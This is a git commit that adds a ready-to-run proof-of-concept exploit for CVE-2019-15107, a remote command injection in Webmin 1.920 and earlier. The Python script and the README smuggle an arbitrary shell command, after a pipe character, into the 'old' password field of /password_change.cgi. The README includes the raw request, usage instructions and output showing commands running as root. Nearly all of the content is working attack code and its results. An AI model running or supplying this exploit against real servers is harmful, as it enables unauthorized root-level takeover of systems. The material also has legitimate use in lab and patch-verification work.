uplaod

2025-06-20 01:40:29 +00:00 · 2019-08-23 18:51:50 +08:00 · 2019-08-23 18:51:50 +08:00 · 8cf55e9c8a
commit 8cf55e9c8a
parent 80f52196f3
4 changed files with 117 additions and 0 deletions
--- a/CVE-2019-15107/CVE-2019-15107.gif
+++ b/CVE-2019-15107/CVE-2019-15107.gif
--- a/CVE-2019-15107/CVE-2019-15107.jpg
+++ b/CVE-2019-15107/CVE-2019-15107.jpg
--- a/CVE-2019-15107/CVE_2019_15107.py
+++ b/CVE-2019-15107/CVE_2019_15107.py
@ -0,0 +1,53 @@
+import requests
+import re
+import requests.packages.urllib3
+requests.packages.urllib3.disable_warnings()
+import sys
+
+
+banner ='''
+ _______           _______       _______  _______  __     _____       __    _______  __    _______  ______  
+(  ____ \|\     /|(  ____ \     / ___   )(  __   )/  \   / ___ \     /  \  (  ____ \/  \  (  __   )/ ___  \ 
+| (    \/| )   ( || (    \/     \/   )  || (  )  |\/) ) ( (   ) )    \/) ) | (    \/\/) ) | (  )  |\/   )  )
+| |      | |   | || (__             /   )| | /   |  | | ( (___) |      | | | (____    | | | | /   |    /  / 
+| |      ( (   ) )|  __)          _/   / | (/ /) |  | |  \____  |      | | (_____ \   | | | (/ /) |   /  /  
+| |       \ \_/ / | (            /   _/  |   / | |  | |       ) |      | |       ) )  | | |   / | |  /  /   
+| (____/\  \   /  | (____/\     (   (__/\|  (__) |__) (_/\____) )    __) (_/\____) )__) (_|  (__) | /  /    
+(_______/   \_/   (_______/_____\_______/(_______)\____/\______/_____\____/\______/ \____/(_______) \_/     
+                          (_____)                              (_____)                                      
+                                     python By jas502n
+
+'''
+print banner
+
+def CVE_2019_15107(url, cmd):
+    vuln_url = url + "/password_change.cgi"
+    headers = {
+    'Accept-Encoding': "gzip, deflate",
+    'Accept': "*/*",
+    'Accept-Language': "en",
+    'User-Agent': "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
+    'Connection': "close",
+    'Cookie': "redirect=1; testing=1; sid=x; sessiontest=1",
+    'Referer': "%s/session_login.cgi"%url,
+    'Content-Type': "application/x-www-form-urlencoded",
+    'Content-Length': "60",
+    'cache-control': "no-cache"
+    } 
+    payload="user=rootxx&pam=&expired=2&old=test|%s&new1=test2&new2=test2" % cmd
+    r = requests.post(url=vuln_url, headers=headers, data=payload, verify=False)
+    if r.status_code ==200 and "The current password is " in r.content : 
+        print "\nvuln_url= %s" % vuln_url
+        m = re.compile(r"<center><h3>Failed to change password : The current password is incorrect(.*)</h3></center>", re.DOTALL)
+        cmd_result = m.findall(r.content)[0]
+        print
+        print "Command Result = %s" % cmd_result
+    else:
+        print "No Vuln Exit!"
+
+
+if __name__ == "__main__":
+    # url = "https://10.10.20.166:10000"
+    url = sys.argv[1]
+    cmd = sys.argv[2]
+    CVE_2019_15107(url, cmd)
--- a/CVE-2019-15107/README.md
+++ b/CVE-2019-15107/README.md
@ -0,0 +1,64 @@
+# CVE-2019-15107  Webmin RCE <=1.920
+
+```
+1.  Webmin <=1.920
+2.  need enable reset Password function
+```
+`https://10.10.20.166:10000/password_change.cgi`
+
+![](./CVE-2019-15107.gif)
+
+
+
+### poc
+```
+POST /password_change.cgi HTTP/1.1
+Host: 10.10.20.166:10000
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Cookie: redirect=1; testing=1; sid=x; sessiontest=1
+Referer: https://10.10.20.166:10000/session_login.cgi
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 60
+
+user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2
+
+
+
+<div class="panel-body">
+<hr>
+<center><h3>Failed to change password : The current password is incorrectuid=0(root) gid=0(root) groups=0(root)
+</h3></center>
+```
+### python usage:
+`python CVE_2019_15107.py https://10.10.20.166:10000 cmd`
+
+
+![](./CVE-2019-15107.jpg)
+```
+C:\Users\CTF\Desktop>python CVE_2019_15107.py https://10.10.20.166:10000 id
+
+ _______           _______       _______  _______  __     _____       __    _______  __    _______  ______
+(  ____ \|\     /|(  ____ \     / ___   )(  __   )/  \   / ___ \     /  \  (  ____ \/  \  (  __   )/ ___  \
+| (    \/| )   ( || (    \/     \/   )  || (  )  |\/) ) ( (   ) )    \/) ) | (    \/\/) ) | (  )  |\/   )  )
+| |      | |   | || (__             /   )| | /   |  | | ( (___) |      | | | (____    | | | | /   |    /  /
+| |      ( (   ) )|  __)          _/   / | (/ /) |  | |  \____  |      | | (_____ \   | | | (/ /) |   /  /
+| |       \ \_/ / | (            /   _/  |   / | |  | |       ) |      | |       ) )  | | |   / | |  /  /
+| (____/\  \   /  | (____/\     (   (__/\|  (__) |__) (_/\____) )    __) (_/\____) )__) (_|  (__) | /  /
+(_______/   \_/   (_______/_____\_______/(_______)\____/\______/_____\____/\______/ \____/(_______) \_/
+                          (_____)                              (_____)
+                                     python By jas502n
+
+
+
+vuln_url= https://10.10.20.166:10000/password_change.cgi
+
+Command Result = uid=0(root) gid=0(root) groups=0(root)
+```
+
+### 参考链接：
+
+https://github.com/vulhub/vulhub/tree/master/webmin/CVE-2019-15107